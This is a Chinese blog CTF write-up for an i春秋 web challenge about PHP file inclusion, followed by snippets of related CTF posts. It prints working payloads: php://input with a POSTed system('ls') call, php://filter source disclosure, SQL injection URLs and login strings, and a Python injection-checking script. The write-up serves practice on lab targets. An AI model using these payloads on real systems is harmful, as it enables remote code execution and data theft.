i春秋 CTF慢慢爬行之路(1)

最新推荐文章于 2022-12-03 01:26:47 发布
原创 最新推荐文章于 2022-12-03 01:26:47 发布 · 731 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种在CTF比赛中常见的Web题型——文件包含漏洞的利用方法。通过构造特定请求,首先列出服务器文件,然后读取目标文件内容并解码获取Flag。


“百度杯”CTF比赛 2017 二月场

 类型:Web题目名称:include


刚进来只看到一个PHP页面和部分PHP代码,看看提示内容,文件包含漏洞。


不多说,用火狐hackbar直接构造:

?path=php://input

post内容:<?php echo system('ls');?>

会爆出具体有哪些文件。

再通过?path=php://filter/read=convert.base64-encode/resource=dle345aae.php

查看dle345aae.php文件中有些什么东西


得到一个字符串,由后面的“=”可以判断是Base64编码,通过Base64解码就能拿到flag
i春秋CTF实战:破解Crypto ezxor谜题,从异或迷阵到Flag重现
huluang的专栏
08-23 2006
本文深入剖析了i春秋CTF中一道典型的Crypto题目"ezxor",详细解析了其基于异或(XOR)的多层加密逻辑。文章从题目背景、加密流程、解密思路三个维度展开,重点讲解了Base64编码、SM3哈希、位移操作和异或累积等核心考点,并提供了完整的Python解密脚本。通过这道题目,作者揭示了CTF密码学题目的设计哲学:通过基础加密操作的巧妙组合来构建复杂系统,考察选手对算法底层原理的理解能力。文章最后给出了实战建议,强调掌握异或性质、数据分块处理等关键技能在CTF竞赛中的重要性。
i春秋ctf练习
sparename的博客
04-24 4999
类型:Misc 题目名称:签到题 类型:Misc 题目名称:所以这是13点吗 类型:Misc 题目名称:嘀嘀嘀 类型:Misc 题目名称:山岚 类型:Misc 题目名称:签到题2 类型:Misc 题目名称:XX 类型:Misc 题目名称:贝丝家族 类型:Misc 题目名称:敲击 类型:Misc 题目名称:签到题3 类型:Misc 题目名称:小常识 类型:Misc 题目名称:回归原始
CTF之路
Sallyyym的博客
04-19 1116
今天做了一个Misc音频隐写题目 首先分享一个隐写工具MP3Stego,附上下载地址呀:https://www.petitcolas.net/fabien/software/ 接下来放题哈哈 (此处不知道怎么传音频……) 那就大概说步骤吧 下载解压MP3Stego,打开到Decode.exe Encode.exe 目录(将音频下载到该目录哦) 快捷键ctrl+R键,输入cmd 然后cd /d...
CTF 之路
weixin_51481155的博客
12-03 207
探索之路
[WUSTCTF2020]爬
zip471642048的博客
06-23 402
题目地址 : https://buuoj.cn/challenges#[WUSTCTF2020]%E7%88%AC 把图片删除后,得到一串16进制数
i春秋-Web()
qwzf
09-02 1595
前言 做了几道i春秋的Web题,所以总结一下。 Web1:爆破-1 题目提示:某六位变量。查看题目,发现是代码审计 <?php include "flag.php"; $a = @$_REQUEST['hello'];//以get或post传入hello,并赋值给`$a` if(!preg_match('/^\w*$/',$a )){//正则表达式^匹配一行的开头,$表示结束。\w表示匹...
i春秋【SQL】
weixin_44722125的博客
05-21 546
看几列 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ichunqiu.com/index.php?id=1 union sele<>ct 1,2,3--+ 爆数据库 http://ffe4385f12ad428598cb9253dca3c3c0e664b023f3c64632.changame.ic...
精选资源
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
i春秋CTF-Basic( 部分Writeup)
i_kei的博客
11-10 2004
一、来看一下flag格式 直接将题目中flag提交即可 二、看我回旋13踢 根据题目,联想到ROT13,进入这个网址解码(https://www.qqxiuzi.cn/bianma/ROT5-13-18-47.php) 三、Base64 根据题意,题目中密文可以用base64解码 进入此网站进行base64解码 (http://ctf.ssleye.com/base64.html) 但是解码过程中发现解码失败 接着换base32试试 发现解码出一段16进制 复制下来进这个网站(https://
i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)
AAAAAAAAAAAA66的博客
11-30 2717
这道题可以直接使用sqlmap 直接跑出。 下文介绍的是手注: 本文用到了搜狐插件hackbar,(使用效果与直接在url栏输入参数相同) 题目(得知是注入题) 判断是否为数字型 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1=1 http://eci-2ze7889omx49vxiu5ma0.cloudeci1.ichunqiu.com/index.php?id=1 and 1.
i春秋登录
weixin_30701575的博客
09-16 1341
打开是个普普通通的表单提交网页 查看源码,没什么东西 抓包试试再 没找到什么有用的信息 尝试注入 用户名admin’or ‘1’=’1 密码随便输 弹出密码错误 再试试admin’or ‘1’=’2 弹出用户不存在 说明这里存在注入点,而且是盲注 构造payload:admin' or user() regexp '^a'%23 (使用java的正则表达式来进行盲...
i春秋Login
weixin_30701575的博客
08-07 429
打开是个很普通的登录网页 查看源码看看有没有东西 找到绿色的提示,可能是账号密码,试试 成功进来了,再右键源码,没东西。。。抓包试试,传repeater里go一下 发现一个奇怪的变量,在request中传入其他值试试 show:1 Go一下,弹出一堆flag获取信息 <?php include 'common.php'; $re...
利用简易爬虫完成一道基础CTF
weixin_30691871的博客
11-27 337
利用简易爬虫完成一道基础CTF题 声明:本文主要写给新手,侧重于表现使用爬虫爬取页面并提交数据的大致过程,所以没有对一些东西解释的很详细,比如表单,post,get方法,感兴趣的可以私信或评论给我。如果文中有哪些问题,也欢迎大家指正。 Written by Menglin Ma 写在前面   如果有想学习基础爬虫的同学,建议在中国大学MOOC上搜索嵩天老师的爬虫课程,讲的真的很细致,也很基...
i春秋-web-include
a3uRa的一个窝
10-06 593
phpinfo内容 发现allow_url_include开启 即允许php://input的形式,并将post的数据,作为php代码执行 ?path=php://input post:&lt;?php system("ls");?&gt; 得到 dle345aae.php index.php phpinfo.php 猜测flag应该在dle345aae.php里面 post:&lt;?php s...
i春秋春秋争霸
NeverLand
02-14 2797
这套题其实涉及技术方面比较少,都是些脑洞题,关键点是要学会思考题意+百度吧。感觉这套题出的没有戏说春秋好,不难,花了半小时(时间都在试+baidu上)~ 第一关 一看~洛书~然后就没有然后了~ 答案:15 第二关 根据提示还是洛书相关,四位全是[阴,阳]的密码。洛书的答案是15,想到大圈小圈,可能是二进制,15的二进制是1111,对比阴阳,1=阳,0=阴。
i春秋 CTF慢慢爬行之路(2)
drejun的博客
05-23 1116
“百度杯”CTF比赛 2017 二月场类型:Web题目名称:Zone根据题目提示的Zone,发现cookie中的值为0;将其设置为”1“然后刷新;利用php://filter文件流读取发现失败。随后访问:http://fa7767f78ffe41fd8e4256927003049e576a28d79f444eaf.game.ichunqiu.com/manages/admin.php?module...
i春秋_真的很简单_过程记录(坑吐了。。。)
热门推荐
等风来
09-19 1万+
0x01 打开实验环境,根据提示打开实验工具dedeCMS (坑一) 等等,我的工具呢???在实验环境里提供的工具中有个dedecms5.7但是不好用啊 WTF??? 实在不行去网上搜了下攻略,发现要自己下载dedecms,一点提示都没有,,,好坑啊 如图,得到网站管理员账号密码 后面的明显是md5加密后的密码,不过数了数只有20位,百度后得知dedecms的特点就是这样 在线破...
i春秋-敲击-flag{xvzoc}
hkk1151043545的博客
11-01 921
方方格格,不断敲击 “wdvtdz qsxdr werdzxc esxcfr uygbn” flag格式为:flag{小写的字符串} 密文全是小写字母,提示是方格、敲击,想到经常使用的九键键盘,但是这样 26 个字母对应九键有点不对,那就可能是 26 键。 迟迟找不到规律,发呆的时候,想看一下敲击键盘的规律,结果发现敲击顺序会形成字母 分别对应 x v z o c ...
网络攻防路-概述 ctf
大紫明宫空离境
12-11 280
计算机领域两大知名赛事ACM&CTF CTF关于网络安全的比赛,起源于黑客比赛,2014年CTF比赛在国内迅速走红,2015年国家硬是把“网络空间安全”划进了一级学科目录。 由于种种原因,目前能够免费使用的CTF训练网络平台,免费注册即可使用: 国内网站 https://adworld.xctf.org.cn/ https://www.ichunqiu.com/competit...
i春秋ctf web
最新发布
01-04
### i春秋CTF Web安全挑战资源 #### 关于i春秋平台及其特色 i春秋是一个提供网络安全培训和竞赛的在线教育平台,该平台不仅提供了丰富的课程学习资料还举办了多次高水平的安全赛事。其中提到的百度杯CTF夺旗大战是由百度安全应急响应中心与i春秋共同发起的一项活动,这项比赛具有较长的时间跨度以及较高的频率特点[^1]。 #### Web安全挑战详情 对于希望参与Web方向CTF练习的人来说,在i春秋上可以找到许多优质的实践机会。通过访问[i春秋官网](http://www.ichunqiu.com),能够获取到有关往届比赛中涉及的具体题目解析及线下总决赛期间所使用的试题重现等内容,这对于提升个人技能水平十分有益处[^2]。 此外,除了官方提供的历年真题外,还可以关注一些第三方站点如[ADWorld XCTF社区](https://adworld.xctf.org.cn/),尽管有时会遇到服务器维护的情况,这里同样收录了不少高质量的Web类CTF挑战项目供爱好者们交流探讨[^3]。 为了更好地准备这类基于Web的应用程序渗透测试环节,建议深入研究常见的漏洞类型(SQL注入、XSS跨站脚本攻击等),并尝试利用工具辅助分析目标系统的潜在弱点。同时也可以参考其他开源平台上分享的技术文档来补充理论知识,比如RPISEC团队整理的一系列二进制逆向工程教程就非常适合用来强化底层原理的理解[^4]。 ```python import requests def check_sql_injection(url, param): payload = "' OR '1'='1" test_url = f"{url}?{param}={payload}" response = requests.get(test_url) if "You have an error in your SQL syntax;" in response.text: print(f"[+] Potential SQL Injection found at {test_url}") else: print("[-] No obvious signs of SQL Injection") # Example usage (for educational purposes only!) check_sql_injection('http://example.com/login', 'username') ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值